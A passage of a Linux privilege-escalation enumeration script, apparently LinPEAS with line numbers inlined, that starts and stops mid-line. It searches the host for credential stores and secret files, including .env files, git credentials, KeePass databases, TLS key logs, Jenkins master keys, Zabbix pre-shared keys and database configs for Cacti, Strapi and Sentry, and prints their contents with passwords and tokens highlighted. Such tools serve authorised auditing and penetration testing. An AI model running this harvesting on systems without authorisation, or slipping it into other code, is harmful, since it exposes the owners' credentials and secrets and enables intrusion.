"$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10663 fi 10664 10665 10666 if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then 10667 print_2title "Analyzing Env Files (limit 70)" 10668 if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env*"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.env.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB]|[pP][rR][iI][vV][aA][tT][eE]|[kK][eE][yY],${SED_RED},g"; done; echo ""; 10669 fi 10670 10671 10672 if [ "$PSTORAGE_PROXY_CONFIG" ] || [ "$DEBUG" ]; then 10673 print_2title "Analyzing Proxy Config Files (limit 70)" 10674 if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"environment$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environment"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "environment$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,environment$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "(http|https|ftp|all)_proxy|no_proxy" | grep -Ev "^#" | sed -${E} "s,(http|https|ftp|all)_proxy|no_proxy,${SED_RED},g"; done; echo ""; 10675 if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"apt\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "apt.conf"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "apt\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,apt\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "Acquire::http::Proxy|Acquire::https::Proxy|proxy" | grep -Ev "^#" | sed -${E} "s,Acquire::http::Proxy|Acquire::https::Proxy|proxy,${SED_RED},g"; done; echo ""; 10676 if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"apt\.conf\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "apt.conf.d"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "apt\.conf\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,apt\.conf\.d$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "Acquire::http::Proxy|Acquire::https::Proxy|proxy" | grep -Ev "^#" | sed -${E} "s,Acquire::http::Proxy|Acquire::https::Proxy|proxy,${SED_RED},g"; done; echo "";done; echo ""; 10677 fi 10678 10679 10680 if [ "$PSTORAGE_SNIFFING_ARTIFACTS" ] || [ "$DEBUG" ]; then 10681 print_2title "Analyzing Sniffing Artifacts Files (limit 70)" 10682 if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"\.pcap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pcap"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "\.pcap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pcap$,${SED_RED},"; done; echo ""; 10683 if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"\.pcapng$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pcapng"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "\.pcapng$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pcapng$,${SED_RED},"; done; echo ""; 10684 if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"keys\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keys.log"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "keys\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,keys\.log$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET" | sed -${E} "s,CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET,${SED_RED},g"; done; echo ""; 10685 if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"sslkeylog\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sslkeylog.log"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "sslkeylog\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sslkeylog\.log$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET" | sed -${E} "s,CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET,${SED_RED},g"; done; echo ""; 10686 fi 10687 10688 10689 if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then 10690 print_2title "Analyzing Msmtprc Files (limit 70)" 10691 if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; 10692 fi 10693 10694 10695 if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG" ]; then 10696 print_2title "Analyzing InfluxDB Files (limit 70)" 10697 if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; 10698 fi 10699 10700 10701 if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then 10702 print_2title "Analyzing Zabbix Files (limit 70)" 10703 if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo ""; 10704 if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; 10705 if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; 10706 fi 10707 10708 10709 if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then 10710 print_2title "Analyzing Github Files (limit 70)" 10711 if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; 10712 if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gitconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10713 if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; 10714 if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; 10715 fi 10716 10717 10718 if [ "$PSTORAGE_SVN" ] || [ "$DEBUG" ]; then 10719 print_2title "Analyzing Svn Files (limit 70)" 10720 if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; 10721 fi 10722 10723 10724 if [ "$PSTORAGE_KEEPASS" ] || [ "$DEBUG" ]; then 10725 print_2title "Analyzing Keepass Files (limit 70)" 10726 if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; 10727 if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; 10728 if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; 10729 if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; 10730 fi 10731 10732 10733 if [ "$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then 10734 print_2title "Analyzing Pre-Shared Keys Files (limit 70)" 10735 if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.psk$,${SED_RED},"; done; echo ""; 10736 fi 10737 10738 10739 if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then 10740 print_2title "Analyzing Pass Store Directories Files (limit 70)" 10741 if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo ""; 10742 fi 10743 10744 10745 if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then 10746 print_2title "Analyzing FTP Files (limit 70)" 10747 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"vsftpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "vsftpd.conf"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "vsftpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vsftpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable" | sed -${E} "s,anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable|[yY][eE][sS],${SED_RED},g" | sed -${E} "s,\s[nN][oO]|=[nN][oO],${SED_GOOD},g"; done; echo ""; 10748 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; 10749 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; 10750 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; 10751 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; 10752 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; 10753 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; 10754 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; 10755 if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; 10756 fi 10757 10758 10759 if [ "$PSTORAGE_SAMBA" ] || [ "$DEBUG" ]; then 10760 print_2title "Analyzing Samba Files (limit 70)" 10761 smbstatus 2>/dev/null 10762 if ! [ "`echo \"$PSTORAGE_SAMBA\" | grep -E \"smb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "smb.conf"; fi; fi; printf "%s" "$PSTORAGE_SAMBA" | grep -E "smb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,smb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "browseable|read only|writable|guest ok|enable privileges|create mask|directory mask|logon script|magic script|magic output" | sed -${E} "s,browseable.*yes|read only.*no|writable.*yes|guest ok.*yes|enable privileges.*yes|create mask.*|directory mask.*|logon script.*|magic script.*|magic output.*,${SED_RED},g" | sed -${E} "s,browseable.*no|read only.*yes|writable.*no|guest ok.*no|enable privileges.*no,${SED_GOOD},g"; done; echo ""; 10763 fi 10764 10765 10766 if [ "$PSTORAGE_DNS" ] || [ "$DEBUG" ]; then 10767 print_2title "Analyzing DNS Files (limit 70)" 10768 if ! [ "`echo \"$PSTORAGE_DNS\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_DNS" | grep -E "bind$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "named.conf*" | while read ff; do ls -ld "$ff" | sed -${E} "s,named.conf.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|//" | sed -${E} "s,allow-query|allow-recursion|allow-transfer|zone-statistics|file .*,${SED_RED},g"; done; echo "";done; echo ""; 10769 fi 10770 10771 10772 if [ "$PSTORAGE_SEEDDMS" ] || [ "$DEBUG" ]; then 10773 print_2title "Analyzing SeedDMS Files (limit 70)" 10774 if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; 10775 fi 10776 10777 10778 if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ]; then 10779 print_2title "Analyzing Ddclient Files (limit 70)" 10780 if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; 10781 fi 10782 10783 10784 if [ "$PSTORAGE_SENTRY" ] || [ "$DEBUG" ]; then 10785 print_2title "Analyzing Sentry Files (limit 70)" 10786 if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; 10787 if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; 10788 fi 10789 10790 10791 if [ "$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then 10792 print_2title "Analyzing Strapi Files (limit 70)" 10793 if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; 10794 fi 10795 10796 10797 if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then 10798 print_2title "Analyzing Cacti Files (limit 70)" 10799 if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; 10800 fi 10801 10802 10803 if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ]; then 10804 print_2title "Analyzing Roundcube Files (limit 70)" 10805 if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; 10806 fi 10807 10808 10809 if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then 10810 print_2title "Analyzing Passbolt Files (limit 70)" 10811 if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; 10812 fi 10813 10814 10815 if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then 10816 print_2title "Analyzing Jetty Files (limit 70)" 10817 if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10818 fi 10819 10820 10821 if [ "$PSTORAGE_JENKINS" ] || [ "$DEBUG" ]; then 10822 print_2title "Analyzing Jenkins Files (limit 70)" 10823 if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"master\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "master.key"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "master\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,master\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10824 if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"hudson\.util\.Secret$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hudson.util.Secret"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "hudson\.util\.Secret$" | while read f; do ls -ld "$f" 2>/dev/null | sed 